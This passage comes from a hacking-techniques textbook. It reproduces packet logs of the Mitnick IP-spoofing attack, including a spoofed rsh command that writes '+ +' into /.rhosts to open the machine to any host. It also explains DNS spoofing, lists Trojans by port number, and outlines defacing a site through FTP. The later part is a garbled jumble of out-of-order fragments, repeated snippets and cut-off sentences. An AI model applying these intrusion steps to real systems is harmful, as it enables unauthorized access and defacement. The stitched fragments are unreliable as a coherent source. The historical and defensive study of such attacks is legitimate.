402 1382726998:1382726998(0) win 4096 14:18:30.265684 x-terminal.shell > apollo.it.luc.edu.992: S 2022848000:2022848000(0) ack 1382726999 win 4096 14:18:30.342506 apollo.it.luc.edu.992 > x-terminal.shell: R 1382726999:1382726999(0) win 0 14:18:30.604547 apollo.it.luc.edu.991 > x-terminal.shell: S 1382726999:1382726999(0) win 4096 14:18:30.775232 x-terminal.shell > apollo.it.luc.edu.991: S 2022976000:2022976000(0) ack 1382727000 win 4096 14:18:30.852084 apollo.it.luc.edu.991 > x-terminal.shell: R 1382727000:1382727000(0) win 0 14:18:31.115036 apollo.it.luc.edu.990 > x-terminal.shell: S 1382727000:1382727000(0) win 4096 14:18:31.284694 x-terminal.shell > apollo.it.luc.edu.990: S 2023104000:2023104000(0) ack 1382727001 win 4096 14:18:31.361684 apollo.it.luc.edu.990 > x-terminal.shell: R 1382727001:1382727001(0) win 0 14:18:31.627817 apollo.it.luc.edu.989 > x-terminal.shell: S 1382727001:1382727001(0) win 4096 14:18:31.795260 x-terminal.shell > apollo.it.luc.edu.989: S 2023232000:2023232000(0) ack 1382727002 win 4096 14:18:31.873056 apollo.it.luc.edu.989 > x-terminal.shell: R 1382727002:1382727002(0) win 0 14:18:32.164597 apollo.it.luc.edu.988 > x-terminal.shell: S 1382727002:1382727002(0) win 4096 14:18:32.335373 x-terminal.shell > apollo.it.luc.edu.988: S 2023360000:2023360000(0) ack 1382727003 win 4096 14:18:32.413041 apollo.it.luc.edu.988 > x-terminal.shell: R 1382727003:1382727003(0) win 0 14:18:32.674779 apollo.it.luc.edu.987 > x-terminal.shell: S 1382727003:1382727003(0) win 4096 14:18:32.845373 x-terminal.shell > apollo.it.luc.edu.987: S 2023488000:2023488000(0) ack 1382727004 win 4096 14:18:32.922158 apollo.it.luc.edu.987 > x-terminal.shell: R 1382727004:1382727004(0) win 0 14:18:33.184839 apollo.it.luc.edu.986 > x-terminal.shell: S 1382727004:1382727004(0) win 4096 14:18:33.355505 x-terminal.shell > apollo.it.luc.edu.986: S 2023616000:2023616000(0) ack 1382727005 win 4096 14:18:33.435221 apollo.it.luc.edu.986 > x-terminal.shell: R 1382727005:1382727005(0) win 0 14:18:33.695170 apollo.it.luc.edu.985 > x-terminal.shell: S 1382727005:1382727005(0) win 4096 14:18:33.985966 x-terminal.shell > apollo.it.luc.edu.985: S 2023744000:2023744000(0) ack 1382727006 win 4096 14:18:34.062407 apollo.it.luc.edu.985 > x-terminal.shell: R 1382727006:1382727006(0) win 0 14:18:34.204953 apollo.it.luc.edu.984 > x-terminal.shell: S 1382727006:1382727006(0) win 4096 14:18:34.375641 x-terminal.shell > apollo.it.luc.edu.984: S 2023872000:2023872000(0) ack 1382727007 win 4096 14:18:34.452830 apollo.it.luc.edu.984 > x-terminal.shell: R 1382727007:1382727007(0) win 0 403 14:18:34.714996 apollo.it.luc.edu.983 > x-terminal.shell: S 1382727007:1382727007(0) win 4096 14:18:34.885071 x-terminal.shell > apollo.it.luc.edu.983: S 2024000000:2024000000(0) ack 1382727008 win 4096 14:18:34.962030 apollo.it.luc.edu.983 > x-terminal.shell: R 1382727008:1382727008(0) win 0 14:18:35.225869 apollo.it.luc.edu.982 > x-terminal.shell: S 1382727008:1382727008(0) win 4096 14:18:35.395723 x-terminal.shell > apollo.it.luc.edu.982: S 2024128000:2024128000(0) ack 1382727009 win 4096 14:18:35.472150 apollo.it.luc.edu.982 > x-terminal.shell: R 1382727009:1382727009(0) win 0 14:18:35.735077 apollo.it.luc.edu.981 > x-terminal.shell: S 1382727009:1382727009(0) win 4096 14:18:35.905684 x-terminal.shell > apollo.it.luc.edu.981: S 2024256000:2024256000(0) ack 1382727010 win 4096 14:18:35.983078 apollo.it.luc.edu.981 > x-terminal.shell: R 1382727010:1382727010(0) win 0 Next we witness the forged connection requests from the masqueraded server (login) to the X- terminal with the predicted sequencing by the attacker. This is based on the previous discovery of X- terminal’s TCP sequencing. With this spoof, the attacker (in this case, Mitnick) has control of communication to the X-terminal.shell masqueraded from the server.login: 14:18:36.245045 server.login > x-terminal.shell: S 1382727010:1382727010(0) win 4096 14:18:36.755522 server.login > x- terminal.shell: . ack 2024384001 win 4096 14:18:37.265404 server.login > x- terminal.shell: P 0:2(2) ack 1 win 4096 14:18:37.775872 server.login > x- terminal.shell: P 2:7(5) ack 1 win 4096 14:18:38.287404 server.login > x- terminal.shell: P 7:32(25) ack 1 win 4096 14:18:37 server# rsh x-terminal "echo + + >>/.rhosts" 14:18:41.347003 server.login > x-terminal.shell: . ack 2 win 4096 14:18:42.255978 server.login > x-terminal.shell: . ack 3 win 4096 14:18:43.165874 server.login > x- terminal.shell: F 32:32(0) ack 3 win 4096 14:18:52.179922 server.login > x-terminal.shell: R 1382727043:1382727043(0) win 4096 14:18:52.236452 server.login > x-terminal.shell: R 1382727044:1382727044(0) win 4096 Then the connections are reset, to empty the connection queue for server.login so that connections may be accepted once again: 14:18:52.298431 130.92.6.97.600 > server.login: R 1382726960:1382726960(0) win 4096 14:18:52.363877 130.92.6.97.601 > server.login: R 1382726961:1382726961(0) win 4096 14:18:52.416916 130.92.6.97.602 > server.login: R 1382726962:1382726962(0) win 4096 404 14:18:52.476873 130.92.6.97.603 > server.login: R 1382726963:1382726963(0) win 4096 14:18:52.536573 130.92.6.97.604 > server.login: R 1382726964:1382726964(0) win 4096 14:18:52.600899 130.92.6.97.605 > server.login: R 1382726965:1382726965(0) win 4096 14:18:52.660231 130.92.6.97.606 > server.login: R 1382726966:1382726966(0) win 4096 14:18:52.717495 130.92.6.97.607 > server.login: R 1382726967:1382726967(0) win 4096 14:18:52.776502 130.92.6.97.608 > server.login: R 1382726968:1382726968(0) win 4096 14:18:52.836536 130.92.6.97.609 > server.login: R 1382726969:1382726969(0) win 4096 14:18:52.937317 130.92.6.97.610 > server.login: R 1382726970:1382726970(0) win 4096 14:18:52.996777 130.92.6.97.611 > server.login: R 1382726971:1382726971(0) win 4096 14:18:53.056758 130.92.6.97.612 > server.login: R 1382726972:1382726972(0) win 4096 14:18:53.116850 130.92.6.97.613 > server.login: R 1382726973:1382726973(0) win 4096 14:18:53.177515 130.92.6.97.614 > server.login: R 1382726974:1382726974(0) win 4096 14:18:53.238496 130.92.6.97.615 > server.login: R 1382726975:1382726975(0) win 4096 14:18:53.297163 130.92.6.97.616 > server.login: R 1382726976:1382726976(0) win 4096 14:18:53.365988 130.92.6.97.617 > server.login: R 1382726977:1382726977(0) win 4096 14:18:53.437287 130.92.6.97.618 > server.login: R 1382726978:1382726978(0) win 4096 14:18:53.496789 130.92.6.97.619 > server.login: R 1382726979:1382726979(0) win 4096 14:18:53.556753 130.92.6.97.620 > server.login: R 1382726980:1382726980(0) win 4096 14:18:53.616954 130.92.6.97.621 > server.login: R 1382726981:1382726981(0) win 4096 14:18:53.676828 130.92.6.97.622 > server.login: R 1382726982:1382726982(0) win 4096 14:18:53.736734 130.92.6.97.623 > server.login: R 1382726983:1382726983(0) win 4096 14:18:53.796732 130.92.6.97.624 > server.login: R 1382726984:1382726984(0) win 4096 14:18:53.867543 130.92.6.97.625 > server.login: R 1382726985:1382726985(0) win 4096 14:18:53.917466 130.92.6.97.626 > server.login: R 1382726986:1382726986(0) win 4096 14:18:53.976769 130.92.6.97.627 > server.login: R 1382726987:1382726987(0) win 4096 14:18:54.039039 130.92.6.97.628 > server.login: R 1382726988:1382726988(0) win 4096 405 14:18:54.097093 130.92.6.97.629 > server.login: R 1382726989:1382726989(0) win 4096 Figure 8.18 Windows IP Spoofer. Soon after gaining root access from IP address spoofing, Mitnick compiled a kernel module that was forced onto an existing STREAMS stack, and which was intended to take control of a tty device. Typically, after completing a compromising attack, the hacker will compile a backdoor into the system that will allow easier future intrusions and remote control. Theoretically, IP spoofing is possible because trusted services rely only on network address-based authentication. Common spoofing software for PC-DOS includes Command IP Spoofer, IP Spoofer (illustrated in Figure 8.18) and Domain WinSpoof; Erect is frequently used for UNIX systems. Recently, much effort has been expended investigating DNS spoofing. Spoofing DNS caching servers enable the attacker to forward visitors to some location other than the intended Web site. Recall that a domain name is a character-based handle that identifies one or more IP addresses. The Domain Name Service (DNS) translates these domain names back into their respective IP addresses. (This service exists for the simple reason that alphabetic domain names are easier to remember than IP addresses.) Also recall that datagrams that travel through the Internet use addresses; therefore, every time a domain name is specified, a DNS service daemon must translate the name into the corresponding IP address. Basically, by entering a domain name into a browser, say, TigerTools.net, a DNS server maps this alphabetic domain name into an IP address, which is where you are forwarded to view the Web site. Using this form of spoofing, an attacker forces a DNS “client” to generate a request to a “server,” then spoofs the response from the “server.” One of the reasons this works is because most DNS servers support “recursive’’ queries. Fundamentally, you can send a request to any DNS server, asking for it to perform a name-to-address translation. To meet the request, that DNS server will send the proper queries to the proper servers to discover this information. Hacking techniques, however, enable an intruder to predict what request that victim server will send out, hence to spoof the response by inserting a fallacious Web site. When executed successfully, the spoofed reply will arrive before the actual response arrives. This is useful to hackers because DNS servers will “cache” information for a specified amount of time. If an intruder can successfully spoof a response for, say, www.yahoo.com, any legitimate users of that DNS server will then be redirected to the intruder’s site. 406 Johannes Erdfelt, a security specialist and hacker enthusiast, has divided DNS spoofing into three conventional techniques: • Technique 1: DNS caching with additional unrelated data. This is the original and most widely used attack for DNS spoofing on IRC servers. The attacker runs a hacked DNS server in order to get a victim domain delegated to him or her. A query sent about the victim domain is sent to the DNS server being hacked. When the query eventually traverses to the hacked DNS server, it replies, placing bogus data to be cached in the Answer, Authority, or Additional sections. • Technique 2: DNS caching by related data. With this variation, hackers use the methodology in technique 1, but modify the reply information to be related to the original query (e.g., if the original query was my.antispoof.site.com, they will insert an MX, CNAME or NS for, say, my.antispoof.site.com, pointing to bogus information to be cached). • Technique 3: DNS ID prediction. Each DNS packet has a 16-bit ID number associated with it, used to determine what the original query was. In the case of the renowned DNS daemon, BIND, this number increases by 1 for each query. A prediction attack can be initiated here– basically a race condition to respond before the correct DNS server does. Trojan Infection Trojan can be defined as a malicious, security-breaking program that is typically disguised as something useful, such as a utility program, joke, or game download. As described in earlier chapters, Trojans are often used to integrate a backdoor, or “hole,” in a system’s security countenance. Currently, the spread of Trojan infections is the result of technological necessity to use ports. Table 8.1 lists the most popular extant Trojans and ports they use. Note that the lower ports are often used by Trojans that steal passwords, either by emailing them to attackers or by hiding them in FTP-directories. The higher ports are often used by remote-access Trojans that can be reached over the Internet, network, VPN, or dial-up access. Table 8.1 Common Ports and Trojans PORT NUMBER TROJAN NAME port 21 Back Construction, Blade Runner, Doly Trojan, Fore, FTP Trojan, Invisible FTP, Larva, WebEx, WinCrash, lamer_FTP port 25 Ajan, Antigen, Email Password Sender, Haebu Coceda (= Naebi), Happy 99, Kuang2, ProMail Trojan, Shtrilitz, lamer_SMTP, Stealth, Tapiras, Terminator, WinPC, WinSpy port 31 Agent 31, Hackers Paradise, Masters Paradise port 41 DeepThroat 1.0-3.1 + Mod (Foreplay) port 48 DRAT v 1.0-3.0b port 50 DRAT port 59 DMSetup port 79 Firehotker 407 port 80 Executor, RingZero port 99 Hidden Port port 110 ProMail Trojan port 113 Kazimas port 119 Happy 99 port 121 JammerKillah port 137 NetBIOS Name(DoS attack) port 138 NetBIOS Datagram(DoS attack) port 139 (TCP) NetBIOS session (DoS attacks) port 139 (UDP) NetBIOS session (DoS attacks) port 146 (TCP) Infector 1.3 port 421 (TCP) Wrappers port 456 (TCP) Hackers Paradise port 531 (TCP) Rasmin port 555 (UDP) Ini-Killer, NeTAdmin, Phase Zero, Stealth Spy port 555 (TCP) Phase Zero port 666 (UDP) Attack FTP, Back Construction, Cain & Abel, Satanz Backdoor, ServeU, Shadow Phyre port 911 Dark Shadow port 999 DeepThroat, WinSatan port 1001 (UDP) Silencer, WebEx port 1010 Doly Trojan 1.1-1.7 (SE) port 1011 Doly Trojan port 1012 Doly Trojan port 1015 Doly Trojan port 1024 NetSpy 1.0-2.0 port 1042(TCP) BLA 1.0-2.0 port 1045 (TCP) Rasmin port 1090 (TCP) Xtreme 408 port 1170 (TCP) Psyber Stream Server, Streaming Audio Trojan, Voice port 1234 (UDP) Ultors Trojan port 1243 (TCP) BackDoor-G, SubSeven, SubSeven Apocalypse port 1245 (UDP) VooDoo Doll port 1269(TCP) Mavericks Matrix port 1349 (UDP) BO DLL port 1492 (TCP) FTP99CMP port 1509 (TCP) Psyber Streaming Server port 1600 (TCP) Shivka-Burka port 1807 (UDP) Spy-Sender port 1981 (TCP) Shockrave port 1999 BackDoor 2.00 - 2.03 port 1999 (TCP) TransScout port 2000 TransScout port 2001 (TCP) Trojan Cow 1.0 port 2001 TransScout Transmission Scout v1.1 - 1.2 Der Spaeher 3 Der Spaeher v3.0 port 2002 TransScout port 2003 TransScout port 2004 TransScout port 2005 TransScout port 2023(TCP) Ripper port 2086 (TCP) Netscape/Corba exploit port 2115 (UDP) Bugs port 2140 (UDP) Deep Throat v1.3 serve Deep Throat 1.3 KeyLogger port 2140 (TCP) The Invasor, Deep Throat v2.0 port 2155 (TCP) Illusion Mailer port 2283 (TCP) HVL Rat 5.30 409 port 2400 PortD port 2565 (TCP) Striker port 2567 (TCP) Lamer Killer port 2568 (TCP) Lamer Killer port 2569 (TCP) Lamer Killer port 2583 (TCP) WinCrash2 port 2600 Digital RootBeer port 2801 (TCP) Phineas Phucker port 2989 (UDP) RAT port 3024 (UDP) WinCrash 1.03 port 3128 RingZero port 3129 Masters Paradise 9.x port 3150 (UDP) Deep Throat, The Invasor port 3459 Eclipse 2000 port 3700 (UDP) Portal of Doom port 3791 (TCP) Total Eclypse port 3801 (UDP) Eclypse 1.0 port 4092 (UDP) WinCrash-alt port 4321 BoBo 1.0 - 2.0 port 4567 (TCP) File Nail port 4590 (TCP) ICQ-Trojan port 5000 (UDP) Bubbel, Back Door Setup, Sockets de Troie/socket23 port 5001 (UDP) Back Door Setup, Sockets de Troie/socket23 port 5011 (TCP) One of the Last Trojans (OOTLT) port 5031 (TCP) Net Metropolitan port 5321 (UDP) Firehotker port 5400 (UDP) Blade Runner, Back Construction port 5401 (UDP) Blade Runner, Back Construction 410 port 5402 (UDP) Blade Runner, Back Construction port 5521 (TCP) Illusion Mailer port 5550 (TCP) Xtcp 2.0 - 2.1 port 5550 (TCP) X-TCP Trojan port 5555 (TCP) ServeMe port 5556 (TCP) BO Facil port 5557 (TCP) BO Facil port 5569 (TCP) Robo-Hack port 5571 (TCP) Lamer variation port 5742 (UDP) WinCrash port 6400 (TCP) The Thing port 6669 (TCP) Vampire 1.0 - 1.2 port 6670 (TCP) DeepThroat port 6683 (UDP) DeltaSource v0.5 - 0.7 port 6771 (TCP) DeepThroat port 6776 (TCP) BackDoor-G, SubSeven port 6838 (UDP) Mstream (Attacker to handler) port 6912 Shit Heep port 6939 (TCP) Indoctrination 0.1 - 0.11 port 6969 GateCrasher, Priority, IRC 3 port 6970 GateCrasher 1.0 - 1.2 port 7000 (UDP) Remote Grab, Kazimas port 7300 (UDP) NetMonitor port 7301 (UDP) NetMonitor port 7302 (UDP) NetMonitor port 7303 (UDP) NetMonitor port 7304 (UDP) NetMonitor port 7305 (UDP) NetMonitor 411 port 7306 (UDP) NetMonitor port 7307 (UDP) NetMonitor port 7308 (UDP) NetMonitor port 7789 (UDP) Back Door Setup, ICKiller port 8080 RingZero port 8989 Recon, recon2, xcon port 9090 Tst2, telnet server port 9400 InCommand 1.0 - 1.4 port 9872 (TCP) Portal of Doom port 9873 Portal of Doom port 9874 Portal of Doom port 9875 Portal of Doom port 9876 Cyber Attacker port 9878 TransScout port 9989 (TCP) iNi-Killer 2.0 - 3.0 port 9999 (TCP) theprayer1 port 10067 (UDP) Portal of Doom port 10101 BrainSpy Vbeta port 10167 (UDP) Portal of Doom port 10520 Acid Shivers + LMacid port 10607 (TCP) Coma 1.09 port 10666 (TCP) Ambush port 11000 (TCP) Senna Spy port 11223 (TCP) Progenic trojan 1.0 - 1.3 port 12076 (TCP) Gjammer port 12223 (UDP) Hack 99 KeyLogger port 12223 (TCP) Hack 99 port 12345 (UDP) GabanBus, NetBus, Pie Bill Gates, X-bill [...]... exchange e- messages Gateways interconnect networks and are categorized according to their OSI model layer of operation; for example, repeaters at Physical Layer 1, bridges at Data Link Layer 2, routers at Network Layer 3, and so on This section describes vulnerability hacking secrets for common gateways that function primarily as access routers, operating at Network Layer 4 A router that connects any... defacing a Web page, nor about making a name for yourself Hacking is about many different things: learning about new operating systems, learning programming languages, learning as much as you can about as many things as you can [To do that you have to] immerse yourself in a pool of technical data, get some good books; install Linux or *BSD Learn; learn everything you can Life is short; don’t waste your time... Neither the author nor the publisher will be held accountable for the use or misuse of the information contained in this book Gateways and Routers Fundamentally, a gateway is a network point that acts as a doorway between multiple networks In a company network, for example, a proxy server may act as a gateway between the internal network and the Internet By the same token, an SMTP gateway would allow users... 60 000 Deep Throat port 60 068 Xzip 60 00 068 port 61 348 (TCP) Bunker-Hill Trojan port 61 466 (TCP) Telecommando port 61 603 (TCP) Bunker-Hill Trojan port 63 485 (TCP) Bunker-Hill Trojan port 65 000 (UDP) Devil v1.3 port 65 000 (TCP) Devil stacheldraht lamer variation port 65 432 The Traitor port 65 432 (UDP) The Traitor port 65 535 RC, ICE Another problem with remote-access or password-stealing Trojans is that... how_many ]\n", name); exit(0); } HiPer ARC Card Login 435 Synopsis: The HiPer ARC card establishes a potential weakness with the default adm account Hack State: Unauthorized access Vulnerabilities: HiPer ARC card v4.1.x revisions Breach: The software that 3Com has developed for the HiPer ARC card (v4.1.x revisions) poses potential security threats After uploading the software, there will be a login account... host programs, the viral code executes, then replicates 414 Typically, comp uter viruses that hackers spread tend to spread carry a payload, that is, the damage that will result after a period of specified time The damage can range from a file corruption, data loss, or even hard disk obliteration Viruses are most often distributed through email attachments, pirate software distribution, and infected... when targeting a Web page hack is to steal passwords If a hacker cannot successfully install a remote-control daemon to gain access to modify Web pages, he or she will typically attempt to obtain login passwords using one of the following methods: • • • • • • • • FTP hacking Telnet hacking Password-stealing Trojans Social engineering (swindling) Breach of HTTP administration front ends Exploitation... Web Hack After we log in via FTP with admin rights and locate the target Web page file (in this case, index.html), we’ll download the file, make our changes with any standard Web-authoring tool, and upload the new hacked version (see Figure 8. 26) To conclude this section as it began, from the hacker’s point of view, the following is a Web hack prediction from Underground hacker team H4G1S members, after... feature-rich dialing tools available today, hence is in widespread use among wardialers The software is really a successor to Toneloc, and is referred to as the Hacker’s Choice (THC) scanner, developed by the infamous van Hauser (president of the hacker’s choice) THC-Scan brought new and useful functionality to the wardialing arena (it automatically detects speed, data bits, parity, and stop bits of discovered... look at the hacker’s world I’ve been part of the ‘ hacking scene” for around four years now, and I’m disgusted by what some so-called hackers are doing these days Groups with names like “milw0rm” and “Dist0rt” think that hacking is about defacing Web pages and destroying Web sites These childish little punks start stupid little “cyber wars” between their groups of crackers They brag about their hacking . (TCP) Hack a Tack 1.0 - 2000 port 31787 (TCP) Hack a Tack port 31788 (TCP) Hack a Tack port 31789 (UDP) Hack a Tack port 31791 (UDP) Hack a Tack port 31792 (UDP) Hack a Tack port. that many of today’s newbies are headed down a path to nowhere. Hacking is not about defacing a Web page, nor about making a name for yourself. Hacking is about many different things: learning. 123 46 (TCP) GabanBus, NetBus, X-bill port 12 361 (TCP) Whack -a- mole port 12 362 (TCP) Whack -a- mole port 1 263 1 WhackJob port 13000 Senna Spy Lamer port 166 60 (TCP) stacheldraht port 169 69